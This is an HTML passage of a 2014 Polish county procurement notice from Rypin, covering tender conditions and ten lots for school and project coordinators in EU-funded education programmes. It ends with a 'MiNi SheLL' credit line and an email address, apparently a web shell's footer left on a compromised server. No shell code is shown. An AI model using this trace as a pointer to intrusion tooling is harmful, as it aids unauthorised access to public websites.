<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy, w zakresie wskazanym w rozdziale 4 pkt 4.1.1. - 4.1.4 SIWZ - sporządzone wg wzoru stanowiącego załącznik nr 3 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. W razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od daty powzięcia wiadomości o powyższych okolicznościach. W takim wypadku Wykonawca może żądać jedynie wynagrodzenia należnego mu z tytułu wykonania części umowy. 
2. W razie wystąpienia okoliczności niezależnych od Stron umowy, w szczególności siły wyższej, które spowodują konieczność przesunięcia terminu realizacji umowy Strony mogą dokonać zmiany umowy w tym zakresie. 
3. Zmiana terminu umowy nie wpłynie na wysokość wynagrodzenia Wykonawcy. 
4. Zamawiający przewiduje możliwość zmiany umowy, w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy. 
5. Zamawiający przewiduje możliwość zmiany umowy, w przypadku gdy konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych pomiędzy Zamawiającym a inną niż Wykonawca stroną, w szczególności Instytucją Zarządzającą. 
6. Zmiany umowy wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiatrypinski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Rypinie, ul. Warszawska 38, 87-500 Rypin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.03.2014 godzina 11:00, miejsce: Starostwo Powiatowe w Rypinie, ul. Warszawska 38, 87-500 Rypin, pokój nr 211 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Dobry zawód - Lepszy Start jest realizowany w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego. Projekt Pogłębiaj wiedzę, rozwijaj umiejętności, poznaj swój region jest realizowany w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji  w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych. Projekt DIAGNOZA - DOSKONALENIE - ROZWÓJ. Kompleksowe wspomaganie rozwoju szkół i przedszkoli powiatu rypińskiego.   jest realizowany w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet III Wysoka jakość w systemie oświaty, Działanie 3.5  Kompleksowe wspomaganie rozwoju szkół..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pełnienie funkcji koordynatora szkolnego Zespołu Szkół Nr 2 im. Unii Europejskiej w Rypinie w projekcie Dobry zawód - Lepszy Start.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pełnienie funkcji koordynatora szkolnego Zespołu Szkół Nr 2 im. Unii Europejskiej w Rypinie w projekcie Dobry zawód - Lepszy Start w okresie od dnia podpisania umowy do 30.09.2015r. Szacunkowa liczba godzin miesięcznie: 25. Szczegółowy opis przedmiotu zamówienia w zakresie części 1 zawiera załącznik nr 1A do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 79.42.11.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pełnienie funkcji koordynatora szkolnego Zespołu Szkół Nr 3 im. Bogdana Chełmickiego w Rypinie  w projekcie Dobry zawód - Lepszy Start.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pełnienie funkcji koordynatora szkolnego Zespołu Szkół Nr 3 im. Bogdana Chełmickiego w Rypinie  w projekcie Dobry zawód - Lepszy Start w okresie od dnia podpisania umowy do 30.09.2015r. Szacunkowa liczba godzin miesięcznie: 25. Szczegółowy opis przedmiotu zamówienia w zakresie części 2 zawiera załącznik nr 1A do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 79.42.11.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pełnienie funkcji koordynatora szkolnego Zespołu Szkół Nr 4 im. Ziemi Dobrzyńskiej w Nadrożu  w projekcie Dobry zawód - Lepszy Start.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pełnienie funkcji koordynatora szkolnego Zespołu Szkół Nr 4 im. Ziemi Dobrzyńskiej w Nadrożu  w projekcie Dobry zawód - Lepszy Start w okresie od dnia podpisania umowy do 30.09.2015r. Szacunkowa liczba godzin miesięcznie: 25. Szczegółowy opis przedmiotu zamówienia w zakresie części 3 zawiera załącznik nr 1A do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 79.42.11.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pełnienie funkcji koordynatora szkolnego Zespołu Szkół Nr 5 im. Ks. Jana Twardowskiego w Rypinie  w projekcie Dobry zawód - Lepszy Start.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pełnienie funkcji koordynatora szkolnego Zespołu Szkół Nr 5 im. Ks. Jana Twardowskiego w Rypinie  w projekcie Dobry zawód - Lepszy Start w okresie od dnia podpisania umowy do 30.09.2015r. Szacunkowa liczba godzin miesięcznie: 10. Szczegółowy opis przedmiotu zamówienia w zakresie części 4 zawiera załącznik nr 1A do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 79.42.11.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pełnienie funkcji koordynatora szkolnego w Liceum Plastycznym wchodzącym w skład Zespołu Szkół Miejskich im. Józefa Wybickiego w Rypinie  w projekcie Dobry zawód - Lepszy Start.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pełnienie funkcji koordynatora szkolnego w Liceum Plastycznym wchodzącym w skład Zespołu Szkół Miejskich im. Józefa Wybickiego w Rypinie  w projekcie Dobry zawód - Lepszy Start w okresie od dnia podpisania umowy do 30.09.2015r. Szacunkowa liczba godzin miesięcznie: 20. Szczegółowy opis przedmiotu zamówienia w zakresie części 5 zawiera załącznik nr 1A do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 79.42.11.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pełnienie funkcji koordynatora szkolnego Zespołu Szkół Nr 1 im. Ks. Czesława Lissowskiego w Rypinie w projekcie Pogłębiaj wiedzę, rozwijaj umiejętności, poznaj swój region.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pełnienie funkcji koordynatora szkolnego Zespołu Szkół Nr 1 im. Ks. Czesława Lissowskiego w Rypinie w projekcie Pogłębiaj wiedzę, rozwijaj umiejętności, poznaj swój region w okresie od dnia podpisania umowy do 30.06.2015r. Szacunkowa liczba godzin miesięcznie: 30. Szczegółowy opis przedmiotu zamówienia w zakresie części 6 zawiera załącznik nr 1A do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 79.42.11.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pełnienie funkcji koordynatora szkolnego Zespołu Szkół Nr 2 im. Unii Europejskiej w Rypinie  Pogłębiaj wiedzę, rozwijaj umiejętności, poznaj swój region.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pełnienie funkcji koordynatora szkolnego Zespołu Szkół Nr 2 im. Unii Europejskiej w Rypinie  Pogłębiaj wiedzę, rozwijaj umiejętności, poznaj swój region w okresie od dnia podpisania umowy do 30.06.2015r. Szacunkowa liczba godzin miesięcznie: 20. Szczegółowy opis przedmiotu zamówienia w zakresie części 7 zawiera załącznik nr 1A do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 79.42.11.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pełnienie funkcji koordynatora szkolnego Zespołu Szkół Nr 4 im. Ziemi Dobrzyńskiej w Nadrożu  Pogłębiaj wiedzę, rozwijaj umiejętności, poznaj swój region.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pełnienie funkcji koordynatora szkolnego Zespołu Szkół Nr 4 im. Ziemi Dobrzyńskiej w Nadrożu Pogłębiaj wiedzę, rozwijaj umiejętności, poznaj swój region w okresie od dnia podpisania umowy do 30.06.2015r. Szacunkowa liczba godzin miesięcznie: 20. Szczegółowy opis przedmiotu zamówienia w zakresie części 8 zawiera załącznik nr 1A do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 79.42.11.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pełnienie funkcji koordynatora projektu DIAGNOZA- DOSKONALENIE -ROZWÓJ. Kompleksowe wspomaganie rozwoju szkół i przedszkoli powiatu rypińskiego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pełnienie funkcji koordynatora projektu DIAGNOZA- DOSKONALENIE -ROZWÓJ. Kompleksowe wspomaganie rozwoju szkół i przedszkoli powiatu rypińskiego. w okresie od dnia podpisania umowy do 30.09.2015r. Szacunkowa liczba godzin miesięcznie: 75. Szczegółowy opis przedmiotu zamówienia w zakresie części 9 zawiera załącznik nr 1B do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 79.42.11.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pełnienie funkcji specjalisty ds. monitoringu projektu DIAGNOZA- DOSKONALENIE -ROZWÓJ. Kompleksowe wspomaganie rozwoju szkół i przedszkoli powiatu rypińskiego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pełnienie funkcji specjalisty ds. monitoringu projektu DIAGNOZA- DOSKONALENIE -ROZWÓJ. Kompleksowe wspomaganie rozwoju szkół i przedszkoli powiatu rypińskiego. w okresie od dnia podpisania umowy do 30.09.2015r. Szacunkowa liczba godzin miesięcznie: 40. Szczegółowy opis przedmiotu zamówienia w zakresie części 10 zawiera załącznik nr 1B do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.12.00-3, 79.42.11.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com